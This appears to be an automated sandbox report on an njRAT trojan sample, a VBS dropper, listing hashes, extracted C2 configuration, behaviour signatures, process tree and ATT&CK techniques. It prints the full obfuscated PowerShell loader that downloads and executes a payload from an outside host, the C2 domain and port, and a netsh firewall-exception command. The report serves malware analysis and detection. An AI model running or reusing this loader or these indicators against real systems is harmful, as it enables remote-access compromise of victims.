njrat | f333e20bf5157aced9fa551fb2384457e8b3b2567ee0f2ef329aad33bfa66fb2

General

Target

REQUIREMENT.vbs
Size

2KB
MD5

b17c7601e3b5dad7c15fde1ff075772b
SHA1

a81a6b3de1470de726e4e31d143bbb5799834598
SHA256

f333e20bf5157aced9fa551fb2384457e8b3b2567ee0f2ef329aad33bfa66fb2
SHA512

504141a430351bc54fb02bbdf52887e0ccff1c82d8ffd967f8bd4356031c61ad920bfbee4e568a45fc43e7783f8203aeabac4292d74be5eca451cdb6edec9825

Score

10^/10

njrat hacked evasion trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://13.112.210.240/bypass.txt

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

C2

njpeople.duckdns.org:6745

Mutex

730f7d095684724798010fdf6a67928d

Attributes

reg_key
730f7d095684724798010fdf6a67928d
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

4 1120 powershell.exe
5 1120 powershell.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1120 set thread context of 548 1120 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1120 powershell.exe
1120 powershell.exe

flow	pid	process
4	1120	powershell.exe
5	1120	powershell.exe

description	pid	process	target process
PID 1120 set thread context of 548	1120	powershell.exe	aspnet_compiler.exe

pid	process
1120	powershell.exe
1120	powershell.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

Processes:

powershell.exeaspnet_compiler.exe

description	pid	process
Token: SeDebugPrivilege	1120	powershell.exe
Token: SeDebugPrivilege	548	aspnet_compiler.exe
Token: 33	548	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	548	aspnet_compiler.exe
Token: 33	548	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	548	aspnet_compiler.exe
Token: 33	548	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	548	aspnet_compiler.exe
Token: 33	548	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	548	aspnet_compiler.exe
Token: 33	548	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	548	aspnet_compiler.exe
Token: 33	548	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	548	aspnet_compiler.exe
Token: 33	548	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	548	aspnet_compiler.exe
Token: 33	548	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	548	aspnet_compiler.exe
Token: 33	548	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	548	aspnet_compiler.exe
Token: 33	548	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	548	aspnet_compiler.exe
Token: 33	548	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	548	aspnet_compiler.exe
Token: 33	548	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	548	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exeaspnet_compiler.exe

description	pid	process	target process
PID 2000 wrote to memory of 1120	2000	WScript.exe	powershell.exe
PID 2000 wrote to memory of 1120	2000	WScript.exe	powershell.exe
PID 2000 wrote to memory of 1120	2000	WScript.exe	powershell.exe
PID 1120 wrote to memory of 548	1120	powershell.exe	aspnet_compiler.exe
PID 1120 wrote to memory of 548	1120	powershell.exe	aspnet_compiler.exe
PID 1120 wrote to memory of 548	1120	powershell.exe	aspnet_compiler.exe
PID 1120 wrote to memory of 548	1120	powershell.exe	aspnet_compiler.exe
PID 1120 wrote to memory of 548	1120	powershell.exe	aspnet_compiler.exe
PID 1120 wrote to memory of 548	1120	powershell.exe	aspnet_compiler.exe
PID 1120 wrote to memory of 548	1120	powershell.exe	aspnet_compiler.exe
PID 1120 wrote to memory of 548	1120	powershell.exe	aspnet_compiler.exe
PID 1120 wrote to memory of 548	1120	powershell.exe	aspnet_compiler.exe
PID 548 wrote to memory of 632	548	aspnet_compiler.exe	netsh.exe
PID 548 wrote to memory of 632	548	aspnet_compiler.exe	netsh.exe
PID 548 wrote to memory of 632	548	aspnet_compiler.exe	netsh.exe
PID 548 wrote to memory of 632	548	aspnet_compiler.exe	netsh.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\REQUIREMENT.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://13|||||||||||||||||||||||||||||||112|||||||||||||||||||||||||||||||210|||||||||||||||||||||||||||||||240/bypass|||||||||||||||||||||||||||||||txt'.Replace('|||||||||||||||||||||||||||||||','.');$LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL='2^ ^5 ^^ 52 ^! ^7 ^8 ^e ^a ^d ^b ^^ ^5 ^! ^7 ^8 ^a 20 3d 20 27 !e ^5 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ^5 !2 ^3 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 5^ 27 2e 52 !5 70 !c !1 !3 !5 28 27 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 27 2c 27 7^ 2e 57 27 29 2e 52 !5 70 !c !1 !3 !5 28 27 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 27 2c 27 !c ^9 ^5 ^e 27 29 3b 0a 2^ 53 58 ^^ ^3 ^! 5! ^7 ^2 ^8 ^e ^a 58 ^^ ^3 ^! 5! ^7 ^2 ^8 ^a ^b 20 3d 20 27 ^^ ^f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a !1 ^^ 53 5^ 3c 3c 3c 3c 3c 3c 3c 3c 3c 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e ^7 27 2e 52 !5 70 !c !1 !3 !5 28 27 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 27 2c 27 57 !e ^c !f 27 29 2e 52 !5 70 !c !1 !3 !5 28 27 3c 3c 3c 3c 3c 3c 3c 3c 3c 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 27 2c 27 72 ^9 !e 27 29 3b 0a 2^ 53 57 58 ^^ ^5 ^3 52 ^! ^7 59 ^8 55 ^a ^9 53 ^^ ^! 5! ^7 ^8 ^a 20 3d 27 ^9 !0 ^5 58 28 !e !0 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d !0 !3 !0 5^ 20 2^ ^5 ^^ 52 ^! ^7 ^8 ^e ^a ^d ^b ^^ 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e ^7 ^2 ^8 ^e ^a 53 ^^ ^! ^7 ^8 29 27 2e 52 !5 70 !c !1 !3 !5 28 27 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 27 2c 27 !5 !0 57 !0 2d ^f !2 !a !0 ^5 27 29 2e 52 !5 70 !c !1 !3 !5 28 27 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3c 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 27 2c 27 ^5 ^! ^7 ^8 ^a 29 2e 2^ 53 58 ^^ ^3 ^! 5! ^7 ^2 ^8 ^e ^a 58 ^^ ^3 ^! 5! ^7 ^2 ^8 ^a ^b 28 2^ 53 5a 58 ^^ ^3 ^! 5! 27 29 3b 0a 2! 28 27 ^9 27 2b 27 ^5 58 27 29 28 2^ 53 57 58 ^^ ^5 ^3 52 ^! ^7 59 ^8 55 ^a ^9 53 ^^ ^! 5! ^7 ^8 ^a 20 2d ^a !f !9 !e 20 27 27 29 7c 2! 28 27 ^9 27 2b 27 ^5 58 27 29 3b'.Replace('^','4').Replace('!','6');Invoke-Expression (-join ($LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL -split ' ' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1120

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:548

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
4⤵
PID:632

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/548-89-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/548-96-0x0000000004CB0000-0x0000000004CB1000-memory.dmp

Filesize
4KB

Download
memory/548-92-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/548-90-0x000000000040747E-mapping.dmp

Download
memory/632-95-0x0000000075D11000-0x0000000075D13000-memory.dmp

Filesize
8KB

Download
memory/632-94-0x0000000000000000-mapping.dmp

Download
memory/1120-72-0x000000001A9D0000-0x000000001A9D1000-memory.dmp

Filesize
4KB

Download
memory/1120-88-0x00000000025F0000-0x0000000002613000-memory.dmp

Filesize
140KB

Download
memory/1120-68-0x000000001C6F0000-0x000000001C6F1000-memory.dmp

Filesize
4KB

Download
memory/1120-69-0x00000000024C0000-0x00000000024C1000-memory.dmp

Filesize
4KB

Download
memory/1120-60-0x0000000000000000-mapping.dmp

Download
memory/1120-84-0x0000000002830000-0x0000000002831000-memory.dmp

Filesize
4KB

Download
memory/1120-85-0x00000000028C0000-0x00000000028C1000-memory.dmp

Filesize
4KB

Download
memory/1120-86-0x000000001ACEA000-0x000000001AD09000-memory.dmp

Filesize
124KB

Download
memory/1120-87-0x000000001C540000-0x000000001C541000-memory.dmp

Filesize
4KB

Download
memory/1120-67-0x0000000002330000-0x0000000002331000-memory.dmp

Filesize
4KB

Download
memory/1120-66-0x00000000023D0000-0x00000000023D1000-memory.dmp

Filesize
4KB

Download
memory/1120-65-0x000000001ACE4000-0x000000001ACE6000-memory.dmp

Filesize
8KB

Download
memory/1120-91-0x00000000028D0000-0x00000000028D1000-memory.dmp

Filesize
4KB

Download
memory/1120-64-0x000000001ACE0000-0x000000001ACE2000-memory.dmp

Filesize
8KB

Download
memory/1120-63-0x000000001AD60000-0x000000001AD61000-memory.dmp

Filesize
4KB

Download
memory/1120-62-0x00000000021F0000-0x00000000021F1000-memory.dmp

Filesize
4KB

Download
memory/2000-59-0x000007FEFC251000-0x000007FEFC253000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads